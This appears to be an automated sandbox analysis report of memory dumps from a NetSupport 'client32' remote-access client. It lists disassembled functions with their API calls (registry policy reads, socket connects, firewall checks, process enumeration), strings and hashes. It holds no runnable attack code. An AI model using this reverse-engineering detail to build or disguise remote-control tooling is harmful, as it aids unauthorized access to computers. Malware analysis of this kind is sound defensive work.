                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Enum$Open$CloseValue
                                                                                                                                                                                • String ID: %s\%s\%s\$Client$Client$Client.%04d.%s$DisableUserPolicies$Software\Policies\NetSupport$Software\Policies\NetSupport\Client$Software\Policies\NetSupport\Client\Standard$Standard
                                                                                                                                                                                • API String ID: 2823542970-1528906934
                                                                                                                                                                                • Opcode ID: 3e9993a9035c77f312dffe24ba5019e8b54eaf472eb0028a7e8d16d5d64a524e
                                                                                                                                                                                • Instruction ID: 91282df486796d8d45fa06834b6704f4eef725291cd5fd64ae30f86ab301b8e1
                                                                                                                                                                                • Opcode Fuzzy Hash: 3e9993a9035c77f312dffe24ba5019e8b54eaf472eb0028a7e8d16d5d64a524e
                                                                                                                                                                                • Instruction Fuzzy Hash: F6415E79A0022D6BD724CF51DC81FEAB7BCEF58748F1041D9EA49A6140DBB06E85CFA1
                                                                                                                                                                                Function 11062256 Relevance: 22.9, APIs: 4, Strings: 9, Instructions: 121registryCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • RegOpenKeyExA.KERNEL32(80000002,Software\Policies\NetSupport\Client,00000000,00020019,?,00000000,?,?), ref: 1106227A
                                                                                                                                                                                  • Part of subcall function 11061C60: RegOpenKeyExA.ADVAPI32(00000003,00000000,00000000,00020019,?,?), ref: 11061C9C
                                                                                                                                                                                  • Part of subcall function 11061C60: RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,?,?,?,00000000,00000000), ref: 11061CF4
                                                                                                                                                                                • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 110622CB
                                                                                                                                                                                • RegEnumKeyExA.ADVAPI32(?,00000001,?,00000100,00000000,00000000,00000000,00000000), ref: 11062385
                                                                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 110623A1
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Enum$Open$CloseValue
                                                                                                                                                                                • String ID: %s\%s\%s\$Client$Client$Client.%04d.%s$DisableUserPolicies$Software\Policies\NetSupport$Software\Policies\NetSupport\Client$Software\Policies\NetSupport\Client\Standard$Standard
                                                                                                                                                                                • API String ID: 2823542970-1528906934
                                                                                                                                                                                • Opcode ID: 32f74a09228e76e5db5ae285f5d3223cbc6d704d14131d4fe0c3cb7115e4f039
                                                                                                                                                                                • Instruction ID: 191c519cb7e83bb51783f2f239933832abb90fe43abc1afe8420de97646f99dc
                                                                                                                                                                                • Opcode Fuzzy Hash: 32f74a09228e76e5db5ae285f5d3223cbc6d704d14131d4fe0c3cb7115e4f039
                                                                                                                                                                                • Instruction Fuzzy Hash: AE415079A0022D6BDB25CB51DC81FEAB77CEF54748F1041D8FA49A6180DBB06A85CFA1
                                                                                                                                                                                Function 11062254 Relevance: 22.9, APIs: 4, Strings: 9, Instructions: 120registryCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • RegOpenKeyExA.KERNEL32(80000002,Software\Policies\NetSupport\Client,00000000,00020019,?,00000000,?,?), ref: 1106227A
                                                                                                                                                                                  • Part of subcall function 11061C60: RegOpenKeyExA.ADVAPI32(00000003,00000000,00000000,00020019,?,?), ref: 11061C9C
                                                                                                                                                                                  • Part of subcall function 11061C60: RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,?,?,?,00000000,00000000), ref: 11061CF4
                                                                                                                                                                                • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 110622CB
                                                                                                                                                                                • RegEnumKeyExA.ADVAPI32(?,00000001,?,00000100,00000000,00000000,00000000,00000000), ref: 11062385
                                                                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 110623A1
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Enum$Open$CloseValue
                                                                                                                                                                                • String ID: %s\%s\%s\$Client$Client$Client.%04d.%s$DisableUserPolicies$Software\Policies\NetSupport$Software\Policies\NetSupport\Client$Software\Policies\NetSupport\Client\Standard$Standard
                                                                                                                                                                                • API String ID: 2823542970-1528906934
                                                                                                                                                                                • Opcode ID: 5056cb524958bcd556a79356ae3317deb1720ae3387edd2c34a5ef1ffae1ffdc
                                                                                                                                                                                • Instruction ID: 4799ca0812b492a306e32992484e394b39d3590f89c6e14e3a536028eb807994
                                                                                                                                                                                • Opcode Fuzzy Hash: 5056cb524958bcd556a79356ae3317deb1720ae3387edd2c34a5ef1ffae1ffdc
                                                                                                                                                                                • Instruction Fuzzy Hash: 93415F79A0022D6BE725CA51DC81FEAB77CEF54748F1041D8FA49A6180DBB06E85CFA1
                                                                                                                                                                                Function 6C607610 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 111networkCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • ioctlsocket.WSOCK32 ref: 6C607642
                                                                                                                                                                                • connect.WSOCK32(00000000,?,?), ref: 6C607659
                                                                                                                                                                                • WSAGetLastError.WSOCK32(00000000,?,?), ref: 6C607660
                                                                                                                                                                                • _memmove.LIBCMT ref: 6C6076D3
                                                                                                                                                                                • select.WSOCK32(00000001,00000000,?,?,?,?,?,00001004,00000000,?,00000010,00000002,00000001,00000000,?,00000000), ref: 6C6076F3
                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 6C607717
                                                                                                                                                                                • ioctlsocket.WSOCK32 ref: 6C60775C
                                                                                                                                                                                • SetLastError.KERNEL32(00000000,00000000,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6C607762
                                                                                                                                                                                • WSAGetLastError.WSOCK32(00000001,00000000,?,?,?,?,?,00001004,00000000,?,00000010,00000002,00000001,00000000,?,00000000), ref: 6C60777A
                                                                                                                                                                                • __WSAFDIsSet.WSOCK32(00000000,?,00000001,00000000,?,?,?,?,?,00001004,00000000,?,00000010,00000002,00000001,00000000), ref: 6C60778B
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3007256676.000000006C601000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C600000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3007234393.000000006C600000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3007315728.000000006C640000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3007336466.000000006C649000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3007374860.000000006C64A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3007374860.000000006C64E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3007443449.000000006C650000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_6c600000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ErrorLast$ioctlsocket$CountTick_memmoveconnectselect
                                                                                                                                                                                • String ID: *BlockingIO$ConnectTimeout$General
                                                                                                                                                                                • API String ID: 4218156244-2969206566
                                                                                                                                                                                • Opcode ID: 9502eaf1070daebba9218cfca9d8551b4dfe877e01a04ce7760f84772349aeac
                                                                                                                                                                                • Instruction ID: b0a28e994cddf3fd620c1985fba149559381c1e7e7ae7ed5fba059bf236ebb01
                                                                                                                                                                                • Opcode Fuzzy Hash: 9502eaf1070daebba9218cfca9d8551b4dfe877e01a04ce7760f84772349aeac
                                                                                                                                                                                • Instruction Fuzzy Hash: 12412D71A043149BE724DB64CD48BDE73BAAB45309F0081E9E509B3641EB749E88CFAD
                                                                                                                                                                                Function 11134D90 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 101windowCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 11146010: GetVersionExA.KERNEL32(?,00000000,00000000), ref: 1114606E
                                                                                                                                                                                  • Part of subcall function 11146010: LoadLibraryA.KERNEL32(kernel32.dll), ref: 11146095
                                                                                                                                                                                  • Part of subcall function 11146010: GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 111460A7
                                                                                                                                                                                  • Part of subcall function 11146010: FreeLibrary.KERNEL32(00000000), ref: 111460BF
                                                                                                                                                                                  • Part of subcall function 11146010: GetSystemDefaultLangID.KERNEL32 ref: 111460CA
                                                                                                                                                                                • AdjustWindowRectEx.USER32(11142328,00CE0000,00000001,00000001), ref: 11134DD7
                                                                                                                                                                                • LoadMenuA.USER32(00000000,000003EC), ref: 11134DE8
                                                                                                                                                                                • GetSystemMetrics.USER32(00000021), ref: 11134DF9
                                                                                                                                                                                • GetSystemMetrics.USER32(0000000F), ref: 11134E01
                                                                                                                                                                                • GetSystemMetrics.USER32(00000004), ref: 11134E07
                                                                                                                                                                                • GetDC.USER32(00000000), ref: 11134E13
                                                                                                                                                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 11134E1E
                                                                                                                                                                                • ReleaseDC.USER32(00000000,00000000), ref: 11134E2A
                                                                                                                                                                                • CreateWindowExA.USER32(00000001,NSMWClass,0262DE80,00CE0000,80000000,80000000,11142328,?,00000000,?,11000000,00000000), ref: 11134E7F
                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,110F8239,00000001,11142328,_debug), ref: 11134E87
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: System$Metrics$LibraryLoadWindow$AddressAdjustCapsCreateDefaultDeviceErrorFreeLangLastMenuProcRectReleaseVersion
                                                                                                                                                                                • String ID: CreateMainWnd, hwnd=%x, e=%d$NSMWClass$mainwnd ht1=%d, ht2=%d, yppi=%d
                                                                                                                                                                                • API String ID: 1322952435-1114959992
                                                                                                                                                                                • Opcode ID: 2b92918748e2a4206d3a0d23d3f296e15d193a83252780e5df0c1835f1c69511
                                                                                                                                                                                • Instruction ID: ea278f5fd7360d42281fd81be3dd0b2008dee34a98883b586f11dcb677731357
                                                                                                                                                                                • Opcode Fuzzy Hash: 2b92918748e2a4206d3a0d23d3f296e15d193a83252780e5df0c1835f1c69511
                                                                                                                                                                                • Instruction Fuzzy Hash: 04317075A40229ABDB149FE58D85FAEFBB8FB48709F100528FA11A7644D6746900CBA4
                                                                                                                                                                                Function 11138580 Relevance: 21.1, APIs: 5, Strings: 7, Instructions: 130COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D
                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 111385E2
                                                                                                                                                                                  • Part of subcall function 11096D90: CoInitialize.OLE32(00000000), ref: 11096DA4
                                                                                                                                                                                  • Part of subcall function 11096D90: CLSIDFromProgID.COMBASE(HNetCfg.FwMgr,?,?,?,?,?,?,?,111385EB), ref: 11096DBE
                                                                                                                                                                                  • Part of subcall function 11096D90: CoCreateInstance.OLE32(?,00000000,00000001,111C1B4C,?,?,?,?,?,?,?,111385EB), ref: 11096DDB
                                                                                                                                                                                  • Part of subcall function 11096D90: CoUninitialize.OLE32(?,?,?,?,?,?,111385EB), ref: 11096DF9
                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 111385F1
                                                                                                                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000105), ref: 11138649
                                                                                                                                                                                • _strrchr.LIBCMT ref: 11138658
                                                                                                                                                                                • _free.LIBCMT ref: 111386AA
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CountTick$CreateFileFromInitializeInstanceModuleNameProgUninitialize__wcstoi64_free_strrchr
                                                                                                                                                                                • String ID: *AutoICFConfig$Client$ICFConfig$ICFConfig2 returned 0x%x$IsICFPresent() took %d ms$IsICFPresent...$No ICF present
                                                                                                                                                                                • API String ID: 1411696172-1270230032
                                                                                                                                                                                • Opcode ID: 472c9febb14dd04da2ccb0dd91b101685b9c5f3ba6f0dedd06ad1b7d1cb9c79c
                                                                                                                                                                                • Instruction ID: 5891752c4c55aadc8c036c0ba7fa863b534ef4ea4707a2085efa3f6ff011156f
                                                                                                                                                                                • Opcode Fuzzy Hash: 472c9febb14dd04da2ccb0dd91b101685b9c5f3ba6f0dedd06ad1b7d1cb9c79c
                                                                                                                                                                                • Instruction Fuzzy Hash: D8419C7AE0012E9BD710DB755C85FDAF778EB5531CF0001B9EC0997284EAB1A944CBE1
                                                                                                                                                                                Function 11133B00 Relevance: 21.1, APIs: 5, Strings: 7, Instructions: 107COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • wsprintfA.USER32 ref: 11133B70
                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 11133BA1
                                                                                                                                                                                • SHGetFolderPathA.SHFOLDER(00000000,0000002B,00000000,00000000,?), ref: 11133BB4
                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 11133BBC
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CountTick$FolderPathwsprintf
                                                                                                                                                                                • String ID: %s%s$CommonPath$HasStudentComponents=%d$Software\NSL$Warning. SHGetFolderPath took %d ms$runplugin.exe$schplayer.exe
                                                                                                                                                                                • API String ID: 1170620360-4157686185
                                                                                                                                                                                • Opcode ID: 32e4d69e4e560c9897634690432e5dbbb3c71a30da77f97bab05ad7f810e8028
                                                                                                                                                                                • Instruction ID: ff3437da4bce093be243bc4ea55ba4e08a4d9634e929d706e548d7c9b68f93f5
                                                                                                                                                                                • Opcode Fuzzy Hash: 32e4d69e4e560c9897634690432e5dbbb3c71a30da77f97bab05ad7f810e8028
                                                                                                                                                                                • Instruction Fuzzy Hash: 68315BB5E1022EABD3209BB19D80FEDF3789B9031DF100065E815A7644EF71B9048795
                                                                                                                                                                                Function 11027200 Relevance: 19.4, APIs: 3, Strings: 8, Instructions: 174sleepCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • _strtok.LIBCMT ref: 11027286
                                                                                                                                                                                • _strtok.LIBCMT ref: 110272C0
                                                                                                                                                                                • Sleep.KERNEL32(?,?,*max_sessions,0000000A,00000000), ref: 110273B4
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _strtok$Sleep
                                                                                                                                                                                • String ID: *max_sessions$Client$Error. not all transports loaded (%d/%d)$LoadTransports(%d)$Protocols$Retrying...$TCPIP$UseNCS
                                                                                                                                                                                • API String ID: 2009458258-3774545468
                                                                                                                                                                                • Opcode ID: ceca80b16dbf02142adc5d4f3c3844b3d3648b118cf6d4daebce3b7869f9825a
                                                                                                                                                                                • Instruction ID: 2d05d95278d551eaaa07460440d96754ad32abd10519b78537541f164f63ece7
                                                                                                                                                                                • Opcode Fuzzy Hash: ceca80b16dbf02142adc5d4f3c3844b3d3648b118cf6d4daebce3b7869f9825a
                                                                                                                                                                                • Instruction Fuzzy Hash: EE513536E0166A8BDB11CFE4CC81FEEFBF4AF95308F644169E81567244D7316849CB92
                                                                                                                                                                                Function 6C608D00 Relevance: 19.4, APIs: 5, Strings: 6, Instructions: 144COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104,6C6167B5), ref: 6C608D6B
                                                                                                                                                                                  • Part of subcall function 6C604F70: LoadLibraryA.KERNEL32(psapi.dll,?,6C608DC8), ref: 6C604F78
                                                                                                                                                                                • GetCurrentProcessId.KERNEL32 ref: 6C608DCB
                                                                                                                                                                                • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 6C608DD8
                                                                                                                                                                                • FreeLibrary.KERNEL32(?), ref: 6C608EBF
                                                                                                                                                                                  • Part of subcall function 6C604FB0: GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 6C604FC4
                                                                                                                                                                                  • Part of subcall function 6C604FB0: K32EnumProcessModules.KERNEL32(00000FA0,?,00000000,6C608E0D,00000000,?,6C608E0D,00000000,?,00000FA0,?), ref: 6C604FE4
                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,00000000,?,00000FA0,?), ref: 6C608EAE
                                                                                                                                                                                  • Part of subcall function 6C605000: GetProcAddress.KERNEL32(?,GetModuleFileNameExA), ref: 6C605014
                                                                                                                                                                                  • Part of subcall function 6C605000: K32GetModuleFileNameExA.KERNEL32(00000FA0,?,00000000,00000104,00000000,?,6C608E50,00000000,?,?,00000104,00000000,?,00000FA0,?), ref: 6C605034
